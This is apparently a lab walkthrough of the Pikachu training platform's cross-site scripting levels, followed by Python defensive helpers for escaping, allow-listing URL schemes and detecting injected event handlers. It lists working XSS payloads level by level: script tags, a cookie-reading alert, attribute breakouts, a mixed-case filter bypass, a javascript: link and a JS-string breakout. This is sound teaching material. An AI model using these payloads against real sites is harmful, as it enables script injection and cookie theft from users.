Pikachu XSS (Cross-Site Scripting)

XSS (Cross-Site Scripting) Overview

Cross-Site Scripting would naturally be abbreviated "CSS", but to avoid a clash with Cascading Style Sheets (CSS) it is known in the security field as XSS. XSS is usually divided into the following common types:
    1. reflected XSS;
    2. stored XSS;
    3. DOM-based XSS;


XSS has long been rated one of the more harmful web vulnerabilities and has consistently ranked in the top three of the OWASP Top 10.
XSS is a vulnerability that takes effect in the front-end browser, so the party it harms is the front-end user.
The main cause of XSS is that the program does not handle its input and output properly, so that "carefully constructed" characters, when output to the front end, are parsed and executed by the browser as valid code.
Defending against XSS therefore usually combines "input filtering" and "output escaping":
  input filtering: filter the input and reject characters that could lead to an XSS attack;
  output escaping: escape the content output to the front end appropriately for the position of the output point;


Reflected XSS (GET)

1. Enter some test text and see what comes back; entering arbitrary characters shows that nothing is filtered.


2. Inspecting the page elements shows the input box is limited to a length of 20; change it to 40.


3. Try an XSS payload: <script>alert('xss')</script>


Reflected XSS (POST)

1. As prompted, log in first.


2. Display the logged-in user's cookie: <script>alert(document.cookie)</script>


Stored XSS

1. Try inserting XSS code into the message board; there is no filtering: <script>alert('xss')</script>


DOM-based XSS

1. Inspect the elements: the page calls a domxss() function; check what needs to be constructed.


2. Try an XSS payload: ' onclick="alert('xss')">


3. Alternatively: '><img src="#" onmouseover="alert('xss')">


DOM XSS-X

1. Same as DOM XSS: ' onclick="alert('xss')">


2. Alternatively: '><img src=1 onerror="alert('xss')">


Blind XSS

1. Enter and submit: <script>alert('xss')</script>


2. Log in to the admin back end and view it.


XSS filtering

1. Try: <script>alert('xss')</script>


2. It is filtered; try a different statement: <img src=1 onerror="alert('xss')">


3. Mixed case also bypasses the filter: <sCript>alert('xss')</sCript>


XSS and htmlspecialchars

1. Try constructing: '><img src=1 onerror="alert('xss')">


2. What the htmlspecialchars function does: it converts predefined characters into HTML entities. The predefined characters are the five & " ' < >, which are converted into the &#xxx; form. By default only double quotes are filtered; if ENT_QUOTES is set, both single and double quotes are filtered. Enter '1' and look at the result.


The single quote is not filtered: '<a href="" 1''="">'1'</a>. If the entered single quote is not filtered, then after htmlspecialchars it is spliced into the HTML statement, where it is automatically shown as double quotes.


3. Construct: ' onclick='alert(/xss/)'


XSS in href input

1. Try: ' onclick='alert(/xss/)'


2. Inspecting the returned element shows that every character has been converted to an HTML entity, including the single quote.
But because the entered URL is concatenated into the <a href='entered content'> attribute, the javascript: syntax can be used to construct the statement javascript:alert('xss')


XSS in JS output

1. Try: javascript:alert('xss')


2. Construct: ';alert(/xss/)//
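The defender's side of the last three levels (the single-quoted attribute behind the htmlspecialchars level, the href attribute, and the JS string output point), as an added Python example that is not part of the original post or of Pikachu: `htmlspecialchars` re-implements PHP's default and ENT_QUOTES behaviour, `safe_href`, `js_string_literal` and `injects_event_handler` are assumed helper names, and the payloads are the ones used in the walkthrough.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import urlparse

# Re-implementation of PHP htmlspecialchars(): by default it encodes & " < > but
# leaves the single quote alone; ENT_QUOTES additionally encodes ' as &#039;.
def htmlspecialchars(value: str, ent_quotes: bool = False) -> str:
    out = html.escape(value, quote=False).replace('"', "&quot;")
    return out.replace("'", "&#039;") if ent_quotes else out

# The lab's output point: user input dropped into a single-quoted attribute.
def render_single_quoted_attr(value: str, ent_quotes: bool = False) -> str:
    return "<input type='text' value='%s'>" % htmlspecialchars(value, ent_quotes)

class _AttrCollector(HTMLParser):
    """Collect the attributes a tolerant HTML parser assigns to the tag."""
    def __init__(self) -> None:
        super().__init__()
        self.attrs = {}
    def handle_starttag(self, tag, attrs):
        self.attrs.update(attrs)

def parsed_attrs(fragment: str) -> dict:
    p = _AttrCollector()
    p.feed(fragment)
    return p.attrs

def injects_event_handler(fragment: str) -> bool:
    """True when the input broke out of value='...' and added an on* attribute."""
    return any(name.lower().startswith("on") for name in parsed_attrs(fragment))

# href output point: entity encoding cannot neutralise javascript:, so the
# scheme is allow-listed instead (assumed helper, not Pikachu code).
def safe_href(url: str, fallback: str = "#") -> str:
    if urlparse(url.strip()).scheme.lower() not in ("http", "https"):
        return fallback
    return htmlspecialchars(url, ent_quotes=True)

# JS output point: emit a complete string literal so ';alert(/xss/)// cannot
# close it early, and neutralise </ so it cannot end the enclosing <script>.
def js_string_literal(value: str) -> str:
    return json.dumps(value).replace("</", "<\\/")

if __name__ == "__main__":
    payload = "' onclick='alert(/xss/)'"  # constructed sample, from the walkthrough
    print(render_single_quoted_attr(payload))        # default flags: handler survives
    print(render_single_quoted_attr(payload, True))  # ENT_QUOTES: stays inside value
```

`injects_event_handler` uses Python's tolerant parser as a stand-in for the browser's tokenizer; it is a detection aid for reviewing rendered output, not a replacement for escaping at the output point.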



Origin www.cnblogs.com/joker-vip/p/12355148.html